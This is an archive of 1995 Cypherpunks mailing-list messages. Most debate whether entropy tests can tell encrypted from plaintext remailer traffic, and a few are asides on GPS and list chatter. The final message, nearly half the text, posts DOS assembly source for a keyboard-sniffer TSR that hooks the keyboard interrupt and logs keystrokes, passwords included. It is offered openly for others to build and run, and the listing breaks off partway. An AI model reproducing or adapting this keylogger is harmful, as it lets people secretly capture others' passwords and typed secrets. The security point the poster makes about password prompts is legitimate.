It will stop all cleartext.  Probably some pictures would get through,
so it would not stop mailbombings, but a volume limitation per 
apparent user and apparent destination would stop mailbombings.

A volume limitation sounds like a lot of work to program though.



 ---------------------------------------------------------------------
We have the right to defend ourselves and our       
property, because of the kind of animals that we    http://nw.com/jamesd/
are.  True law derives from this right, not from    James A. Donald
the arbitrary power of the omnipotent state.        jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 21:41:55 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120540.VAA11357@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>
>   My question is how do I know it is encrypted?  
>
>Calculate an entropy measure of some sort.  Entropy is a measure of
>disributional skew.  Maximum entropy means minimum skew.
>
>For human-readable text of any sort, the monogram entropy, i.e. the
>entropy of individual characters, will _always_ be detectably less
>than maximal.  Encrypted text will always be near maximal.  The two
>are easy to distinguish.  ASCII-armored encrypted text will always be
>right at 6 bits per byte.
>
>For speed of implementation, you don't need even to look at much text.
>You can get a statistically significant measure quite quickly from the
>first couple of kilobytes.  
>
>And since you're only really worried about detecting non-randomness,
>you don't even need to calculate the exact entropy but rather an
>approximation of it.  This approximation can be done with entirely
>fixed point arithmetic, if you're a bit clever about it.
>
>A practical system would cut out a notch at 6/8 for ASCII armor, which
>would make approximation techniques a bit tricky.  More practical is
>just to detect ASCII armor with a regular expression recognizer and
>de-armor it before the entropy check.
>
>Eric
>
>
Won't work!  You can always embed an encrypted message in what 'looks' 
like plaintext.  A trivial example: Encrypt a message with a caesar 
cypher, then build a story where the first char of each word maps to 
each subsequent char from the encrypted text.  At the cost of expanding 
the size of the message by a factor of 5 to 10 you've hidden the 
encrypted message in what looks like a letter to your mother (or a news 
story in the NY Times, etc.)  This is old technique.

Dale H.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 11 Jan 95 22:09:55 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
In-Reply-To: <199501120540.VAA11357@ix3.ix.netcom.com>
Message-ID: <199501120608.WAA29936@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: daleh@ix.netcom.com (Dale Harrison (AEGIS))

   Won't work!  You can always embed an encrypted message in what 'looks' 
   like plaintext.

So people can write special software that gets their message rejected
by an entropy filter.  This is a disadvantage?  It looks like an
irrelevancy to me.

Seems to me that a quite reasonable condition of use of a remailer is
that what is passed isn't human readable.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 22:32:15 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120631.WAA27345@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 
>
>The context this was being discussed in, was trying to make _plaintext_
>look like _ciphertext_. The operator of a data haven or remailer might
>hypothetically want to ensure that all text he dealt with was 
encrypted.
>So your method wouldn't do anything in that area.  

The discussion was one of whether you could distinguish plaintext from 
cyphertext by doing a statitical analysis of the datastream, i.e. can 
you tell one from the other without actually reading each message. The 
answer is no.

Dale H.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 22:47:38 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120646.WAA28573@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>So people can write special software that gets their message rejected
>by an entropy filter.  This is a disadvantage?  It looks like an
>irrelevancy to me.
>
It's an artificial example, but one that points out that merely doing a 
frequency analysis on the datastream isn't enough to guantee the correct 
answer.  Reliable remailer software will have to worry about false postives 
as well as false negatives; especially if it's a fee-for-service operation.

This might also be a nice feature if you're trying to dodge an NSA filter.


>Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.
>
Of course the implicit assumption in that statement is that encrypted 
traffic hasn't been outlawed or regulated, or that the sender doesn't want 
to 'appear' to be sending encrypted traffic.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 11 Jan 95 22:49:51 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: How do I know if its encrypted?
In-Reply-To: <ab3a75370402100421a8@[132.162.201.201]>
Message-ID: <199501120648.WAA12523@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Rochkind wrote:

> The context this was being discussed in, was trying to make _plaintext_
> look like _ciphertext_. The operator of a data haven or remailer might
> hypothetically want to ensure that all text he dealt with was encrypted.
> So your method wouldn't do anything in that area.  Unless you can think of
> a way to embed plaintext in ciphertext in such a  way that it looks like
> ciphertext, and my guess is that any method that did that well would be

As I said in a recent message, there is no general way to "prove" that
a file is encrypted, only to have pretty good confidence that it is.
(This is at the core of algorithmic information theory, a la
Kolmogorov and Chaitin, goes to the heart of what is meant by
"randomness," and is linked as well to the halting problem and other
such stuff.)

I had a need to actually do what Jonathan is talking about: make a
file look like it was encrypted but actually have a simple text
message in it.

My application was an experiment to bait the line for some thought
policemen who decided that they would decide which pictures were
approprate and which were not. So, I created a plausible-looking
PGP-like file and posted it to the new group
"alt.binaries.pictures.erotica.children" and announce that an
"interesting" picture existed there.

The squeals of the net.cops were impressive to behold! Demands to
Netcom that I be expelled from the Net, that the "Child Welfare
Agents" would soon be breaking down my doors, etc. 

But, given the climate of our time (this was in July 1993) and given
the potential failure of the "It's not a _real_ file" defense, I
protected myself in any easy way, but running an English message down
the diagonal, saying something like "This is not a real encrypted file," etc.
Even a lawyer would have to admit that no real encrypted file could
have English emerging randomly. Entropy, and all that.

So, this was an ostensibly encrypted file which contained unencrypted
text. It would very likely have passed any tests for "randomness"
and hence would have been passed by any "encrypted only" filters. (The
English text was a tiny fraction of the entire file, so the deviation
from near-maximal entropy would likely go undetected. Fluctuations
would be larger, depending on file size.)

Nobody spotted the message. After several days, I "let the truth be
told," which of course enraged others. 

I though this digression might be amusing to some.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daleh@ix.netcom.com (Dale Harrison (AEGIS))
Date: Wed, 11 Jan 95 22:51:52 PST
To: cypherpunks@toad.com
Subject: Re: How do I know if its encrypted?
Message-ID: <199501120650.WAA28898@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


You wrote: 

>So people can write special software that gets their message rejected
>by an entropy filter.  This is a disadvantage?  It looks like an
>irrelevancy to me.
>
It's an artificial example, but one that points out that merely doing a 
frequency analysis on the datastream isn't enough to guantee the correct 
answer.  Reliable remailer software will have to worry about false postives 
as well as false negatives; especially if it's a fee-for-service operation.

This might also be a nice feature if you're trying to dodge an NSA filter.


>Seems to me that a quite reasonable condition of use of a remailer is
>that what is passed isn't human readable.
>
Of course the implicit assumption in that statement is that encrypted 
traffic hasn't been outlawed or regulated, or that the sender doesn't want 
to 'appear' to be sending encrypted traffic.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 21:08:43 PST
To: Jim McCoy <mccoy@io.com>
Subject: Re: Storm Signals
In-Reply-To: <199501110911.DAA05932@pentagon.io.com>
Message-ID: <Pine.3.89.9501112307.D1990-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



A paratrooper girl named Christina, had just finished paratrooper
school at  Ft. Bragg. She was headed to Mpls, right around Hallowween.
Then we didn't hear from her for almost a month. Then came the Panama,
troop action, over the Haitian refugees. She didn't get picked, so they
let her come to Mpls, finally. If something goes quiet, you can be sure
something's up. I'd start betting on a Cuban thing first, as Castro
isn't getting any younger. The  U.S. needs the insurgent people in
Cuba rather than having them over here. That's my "guess".

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: spam@telerama.lm.com (Steve Marting)
Date: Wed, 11 Jan 95 20:31:23 PST
Subject: Re: How do I know if its encrypted?
In-Reply-To: <m0rSFsb-000kfuC@mill2.millcomm.com>
Message-ID: <3f2ba8$jbe@asia.lm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <m0rSFsb-000kfuC@mill2.millcomm.com>,
Mark Oeltjenbruns <marko@millcomm.com> wrote:
>        I keep seeing the idea that to keep out of trouble remailers and
>Data Havens should require that data be encrypted before it is accecpted.
>My question is how do I know it is encrypted?  If I say that anyone sending
>me data to be massaged by my system must first encrypt it, how do I know
>they are in fact complying with that request?  After all this is the area
>for the paranoid's to hang out in.
>
>        I see some possible options.  Most don't seem to workable.  I could
>...
[...]
>(2) Force them to pgp it, but that could be defeated by having enough of a
>pgp sig. that my system is fooled.  Not to mention they must use *MY* idea
>of what good encryption is.  After all I could say you must use my
>encryption software that has a backdoor I know of, i.e. clipper, or that
>costs money and can only be bought from me.  This last point would be one
>way of making sure you made some money, but does seem impractial.

You're being contradictory here.  First you say that you have no way of
reliably knowing if it's PGP encrypted, then you say it forces them to use a
certain type of encryption.  Well, if they can fool your system, they aren't
forced to use it!

But that's not really my point.  I think this method is very valid and could
be used in the Real World (well, on the net, at least).  Let's say you require
everyone to use PGP.  Well, if I don't trust PGP but I trust SpamCrypt, there
is nothing stopping me from encrypting my data with SpamCrypt and THEN PGP and
sending it off to your haven.  You see the data is PGP-encrypted, you don't
have the PGP key to decrypt it so you can't be accused of having the ability
to look at my data, and - correct me if I'm wrong here - unless there's some
specific mathematical relation between PGP and SpamCrypt, my encryption is
as good as the STRONGEST layer.

In fact, as you suggest, this is a good way to implement a pay-per-use haven.
All you have to do is only let people use your proprietary data format.  You
can either sell just the program (a one-time fee, like selling accounts on
your haven), or sell single-use keys.  Single-use keys are not only a type of
one-time pad (again, I may be wrong there), but can be presold in arbitrary
lots so companies can buy many keys from you and resell them.

>(5) Only acecpt data from a remailer or other service that would be
>guranteed to be encrypted.  This seems like it would lead to a 'good ole
>boy' network that could exclude service providers it doesn't like.
>etc. etc.

I don't see the problem with this.  You will end up with two types of havens -
those that will accept data from a remailer anyone can use (or from a remailer
that will accept data from one somewhere down the line) and those that won't.
The former are free for anyone to use, and the latter aren't.  Sound like the
difference between moderated and unmoderated newsgroups?  And I don't hear
anyone on cypherpunks bitching about the evil of moderated newsgroups.  What
would be wrong with setting up a haven just for you and your friends?  Or
anyone but Detweiler?  Or anyone but me?

Waiting to be called from some mistake,
-Spam
-- 
--
Spam is: Steve Marting <spam@telerama.lm.com>
My homepage
Beer status: Pilsener bottled and aging




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <jdwilson@gold.chem.hawaii.edu>
Date: Wed, 11 Jan 95 20:47:48 PST
To: cypherpunks@toad.com
Subject: Re: Storm Signals
Message-ID: <199501120452.XAA17600@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> Frankly, I'm quite puzzled by these signs. I can't think of any country that
> seems due for a quick invasion by the USG, but the increase in granularity of
> the GPS information suggests an operation of greater magnitude than just a
> strike against terrorists, drug cartels etc.

The normal clear transmission mode of GPS is intentionally "granulated." 
It was during ODS that the "granularity" was turned off rather than on. 
This was to allow them to purchase commercial GPS equipment for use in the
Gulf theater.  

It could simply be a return to that standard mode.

- -NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |     finger for full PGP key        >
 "  " / \ " |Honolulu, HI  96830    |====================================>
\"  "/ G \" |Serendipitous Solutions|    Also NetSurfer@sersol.com      >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxS1iSoZzwIn1bdtAQHrdQGA4SP5Eawy54J11nCmwI2WzbYPojKeM8S+
gE1DtpEO025SZ7JsBcgoXFBdllLHclvZ
=Nl9j
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 22:09:43 PST
To: cypherpunks@toad.com
Subject: Re: Microsoft TrueName (tm)
Message-ID: <Pine.3.89.9501120055.A2631-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Praise Bob! The Rev. Ivan Stang's been preaching that for years!
Long live the Slackmaster!

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 21:23:22 PST
To: cypherpunks@toad.com
Subject: Re: Getting on the list
Message-ID: <9501120515.AB10649@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:57 PM 1/11/95 EST, Paul J. Ste. Marie wrote:

 (something I didn't mean to send out to cypherpunks)

Sorry.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 11 Jan 95 21:29:38 PST
To: marko@millcomm.com (Mark Oeltjenbruns)
Subject: Re: How do I know if its encrypted?
Message-ID: <9501120521.AA10718@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:37 PM 1/11/95, Timothy C. May wrote:
> ... (Quibblers, this is the place where your announce the precise compression
> seen...)

PKZIP (R)   FAST!   Create/Update Utility   Version 2.04g   02-01-93
Copr. 1989-1993 PKWARE Inc.  All Rights Reserved.  Shareware Version
PKZIP Reg. U.S. Pat. and Tm. Off.   Patent No. 5,051,745

_ 80386 CPU detected.
_ EMS version 4.00 detected.
_ XMS version 2.00 detected.
_ DPMI version 0.90 detected.
_ Using Normal Compression.

Creating ZIP: MAY.ZIP
  Adding: MAY.TXT  Deflating (49%), done.

A pretty good guess, actually.


    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolb@barton.spring.com>
Date: Wed, 11 Jan 95 22:47:59 PST
To: John Draper <crunch@well.sf.ca.us>
Subject: Re: Finally got on
In-Reply-To: <199501120317.TAA07919@well.sf.ca.us>
Message-ID: <Pine.3.89.9501120012.D2631-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



Hope the information, under seperate cover did the job.

Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m00012@KANGA.STCLOUD.MSUS.EDU
Date: Wed, 11 Jan 95 23:02:56 PST
To: cypherpunks@toad.com
Subject: keyboard sniffer TSR source code...
Message-ID: <0098A540.BC444360.1303@KANGA.STCLOUD.MSUS.EDU>
MIME-Version: 1.0
Content-Type: text/plain


For Dos operating systems.

I wrote this in a weekend, and no longer wish to work with it.  

I will release it as is....do not ask for support, and if you know 
where I work, they have no idea I am doing this, so don't make
any assumptions about my company's software.

But, here it is, the source code for a keyboard sniffer program.

After you assemble it, link it, turn it into a .com file, and 
execute it, just hit <alt> page up for a display of the first
half of the buffer, and <alt> page down for a display of the
second half of the buffer.

Then, test it out with pgp or other dos based programs that ask
you for a password (use a fake one), and you will probably see
how insecure most of these programs are.

Mike
-----cut here----
; Keyboard sniffer TSR
;
; asm kbs.asm
; link kbs.obj
; exe2bin kbs kbs.exe
;
;Notes:  This is a keyboard sniffer program.  It is intended to
;        show how easy it is to make your computer insecure.
 
; This program hooks itself to the keyboard interrupt routine.
 
; It is not difficult to imagine a routine that simply replaced
; the keyboard interrupt routine, or simply monitored the
; keyboard buffer and pointers from another interrupt routine,
; e.g., the timer interrupt.
 
; It is also not a stretch of the imagination to say that it is
; possible that a program that monitors the keyboard buffer and
; display area for things that look like passwords (e.g., look
; for certain prompts, store next 500 characters) to either an
; unused area of the disk, or a hidden file, already exists.
 
;  That is to say, the FBI, for example, could have already
; hired some programmers to come up with a .gif viewer that
; also attaches a keyboard sniffer to your system snooping
; for passwords, in the hopes that if and when the find a
; suspected (fill-in-the-blank) "crimminal", all they have
; to do is find the secret file created with their trojan TSR.
 
;
;
;
;
 
KB_INT_NUM        EQU     9     ;keyboard interrupt
BUFFER_SIZE       EQU     0b94H  ;our buffer size, 19 lines 2 buffers
 
TLC             EQU     0C9H    ;top left corner
HL              EQU     0CDH    ;horizontal line
TRC             EQU     0BBH    ;top right corner
VL              EQU     0BAH    ;vertical line
BLC             EQU     0C8H    ;bottom left corner
BRC             EQU     0BCH    ;bottom right corner
LCT             EQU     0CCH    ;left center tap
RCT             EQU     0B9H    ;right center tap
 
ALTPGUP         EQU     9900H
ALTPGDN         EQU     0A100H
 
ROM_BIOS_DATA   SEGMENT AT 40H                  ;bios statuses and kb buffer
        ORG             1AH                     ;absolute
        KB_HEAD         DW      ?               ;head of kb buffer
        KB_TAIL         DW      ?               ;tail of kb buffer
        KB_BUFFER       DW      16 DUP (?)      ;The keyboard buffer
        KB_BUFFER_END   LABEL   WORD
ROM_BIOS_DATA   ENDS
 
CODE_SEG        SEGMENT
        ASSUME  CS:CODE_SEG
        ORG     100H                          ; .com file
FIRST:  JMP     INSTALL_INTERRUPTS_MAIN
 
; data area...
 
        buffer  db      BUFFER_SIZE dup ('*')
        head    dw      5
        tail    dw      5
        cnt     dw      ?
        ind     dw      ?
        show_buff       dw      0
        lkb_tail        dw      0       ;last key board til
                                        ;this is for programs that leave
                                        ;the character in bios buffer
                                        ;past one interrupt, e.g., pgp
        OLD_KB_INTERRUPT   LABEL   WORD
        OLD_KB_INTERRUPT_ADDR      DD      ?
        row     db      ?
        idstring        db      "0x5fcf9eb78a01ef28"   ;18 long
KBINTERRUPT    PROC    NEAR
        ASSUME  CS:CODE_SEG
        PUSH    AX
        PUSH    BX
        PUSH    CX
        PUSH    DX
        PUSH    DI
        PUSH    SI
        PUSH    DS
        PUSH    ES
        PUSHF
        CALL    OLD_KB_INTERRUPT_ADDR
 
        CLI
 
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX           ; point ds to ROM_BIOS_AREA...
 
        MOV     BX,KB_TAIL
        CMP     BX,KB_HEAD
        JE      nogo1           ;origianal keyboard interrupt has deleted char
        jmp     short go1
        mov     cx,bx
nogo1:  jmp     kbexit2    ;too far for je...
 
go1:    ;check to see if we already processed this character
        mov     cx,bx
ASSUME DS:CODE_SEG
        mov     bx,cs
        mov     ds,bx
 
        cmp     cx,lkb_tail ;is it the same as last time?
        jne     go3  ;no
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        mov     ds,bx
        jmp     kbexit2
go3:
        mov     lkb_tail,cx     ;save new tail
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        mov     ds,bx
        mov     bx,cx
 
        SUB     BX,2
        CMP     BX,OFFSET KB_BUFFER     ;did we wrap around?
        JAE     NO_WRAP                 ;no
 
        MOV     BX,OFFSET KB_BUFFER_END ;yes
        SUB     BX,2
 
NO_WRAP:MOV     DX,[BX] ;        char in DX now...
 
        CMP     DX,ALTPGUP      ;altpgup hit?
        jne     checknext1      ;no
        jmp     short   go2     ;yes, display first half of buffer
 
checknext1: CMP DX,ALTPGDN      ;altpgdn hit?
        jne     nogo2           ;no
        mov     kb_tail,bx      ;delete alt pgdn from kb_buffer
assume ds:code_seg
        mov     cx,bx
        mov     bx,cs
        mov     ds,bx
        xor     bx,bx           ;garbage last tail
        mov     lkb_tail,bx
        mov     bx,offset buffer;yes, display second half of buffer
        add     bx,BUFFER_SIZE/2
        mov     show_buff,bx
        call    dump_buffer     ;dump second half
        jmp     kbexit1
 
nogo2:  jmp     save_key        ;too far for jne..
 
go2:
assume ds:rom_bios_data
        mov     cx,bx
        mov     bx,rom_bios_data
        mov     ds,bx
        mov     bx,cx
        mov     kb_tail,bx      ;delete '<alt> pgup' from kb_buffer
assume ds:code_seg
        mov     cx,bx
        mov     bx,cs
        mov     ds,bx
        xor     bx,bx           ;garbage last tail
        mov     lkb_tail,bx
        mov     bx,offset buffer        ;first half buffer
        mov     show_buff,bx
        call    dump_buffer     ;dump first half
        jmp     kbexit1
 
save_key:
 
ASSUME  DS:CODE_SEG
        MOV     BX,CS
        MOV     DS,BX
 
        mov     bx,offset buffer
        add     bx,head
        mov     [bx],dl ;dh?
        inc     bx
 
        mov     cx,offset buffer
        add     cx,BUFFER_SIZE
        cmp     bx,cx           ; at end of buffer?
        jz      wrap_it         ; yes
 
        sub     bx,offset buffer
        mov     head,bx
        jmp     kbexit1
 
wrap_it:        xor bx,bx
        mov     head,bx
        jmp     kbexit1
 
kbexit1:
 
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX
kbexit2:        POP     ES
        POP     DS
        POP     SI
        POP     DI
        POP     DX
        POP     CX
        POP     BX
        POP     AX
        STI
        IRET
KBINTERRUPT    ENDP
 
dump_buffer     PROC    NEAR
ASSUME  DS:CODE_SEG
        MOV     BX,CS
        MOV     DS,BX
        STI
 
        jmp     over_data
 
        sl1     db      "                           Keyboard Sniffer Program                           ",0
        sl2     db      " Short Circuit, Inc.                  Version:  0.72 (Beta), (C)opyright 1995 ",0
 
over_data:      mov     dh,0    ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,TLC  ;top left corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     dh,0    ;row
        mov     dl,4fh  ;column = 79 dec
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,TRC  ;top right corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     dh,17h  ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,BLC  ;bottom left corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     dh,17h  ;row
        mov     dl,4fh  ;column=79 dec
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,1    ;count?
        mov     al,BRC  ;bottom right corner
        mov     ah,0ah  ;service
        int     10h
 
        mov     cx,4eh  ;78 dec
 
        mov     dh,0    ;row
        mov     dl,1    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,4eh  ; 78 characters
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
        mov     dh,3    ;row
        mov     dl,1    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,4eh  ; 78 characters
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
        mov     dh,17h  ;row
        mov     dl,1
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     bh,0    ;page
        mov     cx,4eh  ;count
        mov     al,HL   ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
        mov     cx,16h  ;22 lines
dline:  mov     dh,cl   ;row
        mov     dl,0    ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     dx,cx   ;save cx
        mov     bh,0    ;page
        mov     cx,1    ;count
        mov     al,VL   ;vertical line
        mov     ah,0ah  ;service
        int     10h
        mov     cx,dx   ;restore cx
 
        mov     dh,cl   ;row
        mov     dl,4fh  ;column
        mov     bh,0    ;page
        mov     ah,2    ;service
        int     10h     ;set cursor position
 
        mov     dx,cx   ;save cx
        mov     bh,0    ;page
        mov     cx,1    ;count
        mov     al,VL   ;vertical line
        mov     ah,0ah  ;service
        int     10h
        mov     cx,dx   ;restore cx
        loop    dline
 
        mov     dh, 3h  ;row
        mov     dl, 0
        mov     bh, 0   ;page
        mov     ah, 2   ;service
        int     10h     ;set cursor position
 
        mov     bh, 0   ;page
        mov     cx, 1   ;count
        mov     al,LCT  ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
 
        mov     dh, 3h  ;row
        mov     dl, 4fh ;column
        mov     bh, 0   ;page
        mov     ah, 2   ;service
        int     10h     ;set cursor position
 
        mov     bh, 0   ;page
        mov     cx, 1   ;count
        mov     al,RCT  ;horizontal line
        mov     ah,0ah  ;service
        int     10h     ;put char
 
 
 
        mov     cx, BUFFER_SIZE/2 -1 ;going backwards...
        mov     ind, cx
        mov     cl, 13h
 
dorows: mov     row, cl
        mov     cx, 4eh
ll0:    mov     cnt, cx
        mov     dl, cl  ;to end of line
        ;inc     dl     ;cnt was 1 too small
        mov     dh,row
        inc     dh
        inc     dh
        inc     dh
        mov     ah,2            ;set cursor position
        mov     bh,0            ;page 0
        int     10h             ;move to 0,0
 
        mov     bx,show_buff    ;show_buff points to correct half...
        add     bx,ind          ;ind must have index, *(show_buff + ind)
        mov     al,[bx]
        mov     bh,0
        mov     cx,1
        mov     ah,0ah
        int     10h
        dec     ind             ;decrement index
        mov     cx,cnt
        loop ll0
        mov     cl,row
        dec     cl
        jnz     dorows
 
 
        mov     dh,1
        mov     dl,1
        mov     bx,offset sl1
        call    print_string
        mov     dh,2
        mov     dl,1
        mov     bx,offset sl2
        call    print_string
 
        mov     dh,18h
        mov     dl,4
        mov     bh,0
        mov     ah,2
        int     10h     ;move back to correct position
 
        ret
dump_buffer     ENDP
 
print_string    PROC    NEAR
        ;assumes ds==cs
        ;null terminated string, address in bx...
        ;row in dh
        ;col in dl
        ;uses bios int 10h, safe for tsr programs...
        jmp     over_local_ps
        sadd    dw      ?
over_local_ps:
        mov     sadd,bx
 
np:     mov     bh,0
        mov     ah,2
        int     10h
        mov     bx,sadd
        mov     al,[bx]
        cmp     al,0    ;is it 0?
        je      pse     ;yes, return
        inc     bx
        mov     sadd,bx
        inc     dl
        mov     bh,0
        mov     cx,1
        mov     ah,0ah
        int     10h
        jmp     np      ;next print (next character)
pse:    ret             ;done, encountered 0
print_string    ENDP
 
 
 
; Anything before this point stays in memory if it's okay to install...
 
 
; tests to see if kbs is already installed, returns
; zf=1 if it was already installed.
; zf=0 if it has not been previously installed.
kbia      PROC    NEAR
	;assumes ds points to code segment...
	MOV	AH, 35H 		;put old vector into es:bx
	MOV	AL,KB_INT_NUM
	INT	21H
 
        mov     si,offset idstring      ;ds:si points to our string
        mov     di,bx
        sub     di, 12h                 ;es:di points to other string?
        mov     cx,12h
        REPE    cmpsb
        ret
kbia endp
 
 
INSTALL_INTERRUPTS_MAIN       PROC    NEAR
 
ASSUME  DS:CODE_SEG
                mov     bx,cs
                mov     ds,bx
                xor     bx,bx
                mov     head,bx
                mov     tail,bx
                jmp     over_temp_data
                instg           db      "Kbs installed.",0dh,0ah,"$"
                notinstg        db      "Kbs already installed.",0dh,0ah,"$"
over_temp_data: call    kbia
                je      dont_install_it
                jmp     install_it
dont_install_it:
                mov     dx,offset notinstg
                mov     ah,09h
                int     21h
                mov     bx,cs
                mov     es,bx
                int     20h
 
install_it:     MOV     AH, 35H                 ;put old vector into es:bx
                MOV     AL,KB_INT_NUM
                INT     21H
 
                MOV     OLD_KB_INTERRUPT,BX
                MOV     OLD_KB_INTERRUPT[2],ES
 
                MOV     AH,25H                  ;set new keyboard interrupt
                LEA     DX,KBINTERRUPT
                INT     21H
 
                mov     dx,offset instg
                mov     ah,09h
                int     21h
 
ASSUME  DS:ROM_BIOS_DATA
        MOV     BX,ROM_BIOS_DATA
        MOV     DS,BX
        mov     cx,KB_TAIL
 
